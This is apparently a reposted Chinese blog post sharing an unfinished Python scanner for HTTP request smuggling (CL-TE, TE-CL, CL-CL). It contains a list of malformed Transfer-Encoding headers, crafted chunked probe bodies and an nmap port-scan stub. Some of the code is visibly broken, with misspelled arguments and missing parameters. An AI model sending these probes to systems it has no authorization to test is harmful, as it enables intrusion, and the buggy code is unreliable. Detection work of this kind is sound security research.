其他分享
首页 > 其他分享> > http-smuggling

http-smuggling

作者:互联网

前言

本来想写成获取参数,启动nmap扫描端口,对所有得到HTTP端口进行测试。后来偷懒写成pocsuite3的插件了。
项目地址

原理与攻击面

协议层的攻击——HTTP请求走私
一篇文章带你读懂http请求走私
seebug这篇中提到的几篇blackhat议题建议都看看

检测脚本-草稿

freebuf上的一篇检测脚本实现
nmap扫描端口,识别http服务还没写完
命令行运行,接受参数部分也没写完

# -*- coding:utf-8 -*-
from libnmap import process
from libnmap import parser
import requests
import time
import urllib3
import http
import argparse
import collections


http.client._is_legal_header_name = lambda x: True
http.client._is_illegal_header_value = lambda x: False
urllib3.disable_warnings()


def get_opt():
    usage = "-u <a target url>\n -n <target network segment>\n -f <targets url file>\n -s <enable multiprocess>\n"
    opt_parser = argparse.ArgumentParser(usage=usage, epilog="written by wuerror")
    opt_parser.add_argument('-u', type=str, nargs='?', dest='url', help="imput a single target url")
    opt_parser.add_argument('-s', action="store_ture", dest='sig', help="a signal for start multiprocess")
    args = opt_parser.parse_args()
    return args


def nmap_scan(target):
    nmap_proc = process.NmapProcess(target, options="-sV")
    nmap_proc.run_background()
    while nmap_proc.is_running():
        print("Nmap Scan running: ETC: {0} DONE: {1}%".format(nmap_proc.etc,nmap_proc.progress))
        time.sleep(2)
    if(nmap_proc.rc == 0):
        parsed = parser.NmapParser.parse(nmap_proc.stdout)
        for host in parsed.hosts:
            print(host)
            print(host.services)
            for serv in host.services:
                if serv.service == "http" or serv.service == "https":
                    pass


class Smuggler():
    """
    the main function class
    """
    def __init__(self):
        # 用于人工复核
        self.recheck_headers = None
        self.payload_headers = []
        # malformed te headers
        self.te_headers = []
        self.Transfer_Encoding = [["Transfer-Encoding", "chunked"],
                                   ["Transfer-Encoding ", "chunked"],
                                   ["Transfer_Encoding", "chunked"],
                                   ["Transfer Encoding", "chunked"],
                                   [" Transfer-Encoding", "chunked"],
                                   ["Transfer-Encoding", "  chunked"],
                                   ["Transfer-Encoding", "chunked"],
                                   ["Transfer-Encoding", "\tchunked"],
                                   ["Transfer-Encoding", "\u000Bchunked"],
                                   ["Content-Encoding", " chunked"],
                                   ["Transfer-Encoding", "\n chunked"],
                                   ["Transfer-Encoding\n ", " chunked"],
                                   ["Transfer-Encoding", " \"chunked\""],
                                   ["Transfer-Encoding", " 'chunked'"],
                                   ["Transfer-Encoding", " \n\u000Bchunked"],
                                   ["Transfer-Encoding", " \n\tchunked"],
                                   ["Transfer-Encoding", " chunked, cow"],
                                   ["Transfer-Encoding", " cow, "],
                                   ["Transfer-Encoding", " chunked\r\nTransfer-encoding: cow"],
                                   ["Transfer-Encoding", " chunk"],
                                   ["Transfer-Encoding", " cHuNkeD"],
                                   ["TrAnSFer-EnCODinG", " cHuNkeD"],
                                   ["Transfer-Encoding", " CHUNKED"],
                                   ["TRANSFER-ENCODING", " CHUNKED"],
                                   ["Transfer-Encoding", " chunked\r"],
                                   ["Transfer-Encoding", " chunked\t"],
                                   ["Transfer-Encoding", " cow\r\nTransfer-Encoding: chunked"],
                                   ["Transfer-Encoding", " cow\r\nTransfer-Encoding: chunked"],
                                   ["Transfer\r-Encoding", " chunked"],
                                   ["barn\n\nTransfer-Encoding", " chunked"],
                                   ]

    def malform(self):
        """
        制作畸形transfer-encoding头
        """
        self.te_headers = self.Transfer_Encoding
        for x in self.Transfer_Encoding:
            if " " == x[1][0]:
                for i in [9, 11, 12, 13]:
                    # print (type(chr(i)))
                    c = str(chr(i))
                    self.te_headers.append([x[0], c + x[1][1:]])

    def make_headers(self):
        """
        为每一个Transfer-encoding头添加其他header值
        """
        for x in self.te_headers:
            headers = collections.OrderedDict()
            headers[x[0]] = x[1]
            headers['Cache-Control'] = "no-cache"
            headers['Content-Type'] = "application/x-www-form-urlencoded"
            headers['User-Agent'] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0"
            self.payload_headers.append(headers)

    def send_payload(self, url, headers={}, payload=""):
        """
        通过requests预处理来发送检测http报文
        :param url:检测目标url
        :param headers:HTTP头部
        :param payload:HTTP body
        :return resp_time:响应报文的时延
        """
        s = requests.Session()
        req = requests.Request('POST', url, data=payload)
        prepped = req.prepare()
        prepped.headers = headers
        resp_time = 0
        try:
            resp = s.send(prepped, verify=False, timeout=10)
            resp_time = resp.elapsed.total_seconds()
        except requests.exceptions.ReadTimeout as e:
            print(e.args)
            resp_time = 10
        except requests.exceptions.ConnectionError as ex:
            print(ex.args)
            print("failed to connect")
            return None
        return resp_time
    
    def check_clte(self, url):
        """
        检测CL-TE类型走私漏洞
        """
        payloads = self.payload_headers
        for headers in payloads:
            headers['Content-Length'] = 4
            payload = "1\r\nZ\r\nQ\r\n\r\n\r\n"
            t2 = self.send_payload(headers, payload)
            if t2 is None:
                t2 = 0
            if t2 < 5:
                continue

            #正常报文
            headers['Content-Length'] = 11
            payload = "1\r\nZ\r\nQ\r\n\r\n\r\n"
            t1 = self.send_payload(url, headers, payload)

            if t1 is None:
                t1 = 1

            print(t1, t2)
            if t2 > 5 and t2 / t1 >= 5:
                self.recheck_headers = [headers]
                #record a log
                return True
        return False

    def check_tecl(self, url):
        """
        检测TE-CL类型走私漏洞
        """
        payloads = self.payload_headers
        for headers in payloads:
            payload = "0\r\n\r\nX"
            headers['Content-Length'] = 6
            t2 = self.send_payload(headers, payload)
            if t2 is None:
                t2 = 0
            if t2 < 5:
                continue

            payload = "0\r\n\r\n"
            headers['Content-Length'] = 5
            t1 = self.send_payload(headers, payload)
            if t1 is None:
                t1 = 1
            if t2 is None:
                t2 = 0
            if t2 > 5 and t2 / t1 >= 5:
                self.recheck_headers = [headers]
                #record a log
                return True
        return False 

    def send_cl_payload(self, url, header, payload):
        """
        发送CL-CL类型检测报文
        """
        sess = requests.Session()
        req = requests.Request('POST', url, data=payload)
        prepped = req.prepare()
        prepped.headers = header
        try:
            resp = sess.send(prepped, verify=False, timeout=10)
            if(resp.status_code == 400):
                return False
            else:
                return True
        except Exception as e:
            print(e.args)
            return False
    
    def check_clcl(self, url):
        """
        检测CL-CL类型漏洞
        RFC 7230 section 3.3.3
        """
        length = ["Content-Length", " 8\r\nContent-Length: 5"]
        clh = []
        cl_payload = []
        if " " == length[1][0]:
            # ascill of HT,VT,FF,CR
            for i in [9, 11, 12, 13]:
                c = str(chr(i))
                clh.append([length[0], c + length[1][1:]])
        for cl in clh:
            cl_header = collections.OrderedDict()
            cl_header[cl[0]] = cl[1]
            cl_header["Cache-Control"] = "no-cache"
            cl_header['Content-Type'] = "application/x-www-form-urlencoded"
            cl_header['User-Agent'] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0"
            cl_payload.append(cl_header)
        for head in cl_payload:
            flag = self.send_cl_payload(url, head, "0\r\n\r\n")
            if flag is True:
                print("clcl detect")

    def run(self, url):
        """
        entrance
        """
        try:
            if self.check_clte(url):
                print("vuln detect: CL-TE")
            elif self.check_tecl(url):
                print("vuln detect:TE-CL")
            elif self.check_clcl(url):
                print("vuln detect:CL-CL")
            else:
                print("not detect")
        except Exception as e:
            print(e.args)


if __name__ == "__main__":
    smug = Smuggler()
    smug.malform()
    smug.make_headers()
    url = ''
    smug.run(url)

最后

我感觉这漏洞想利用也蛮难的,不是一个exp就能搞定的

标签:http,Encoding,Transfer,smuggling,payload,headers,chunked,self
来源: https://www.cnblogs.com/wuerror/p/14508875.html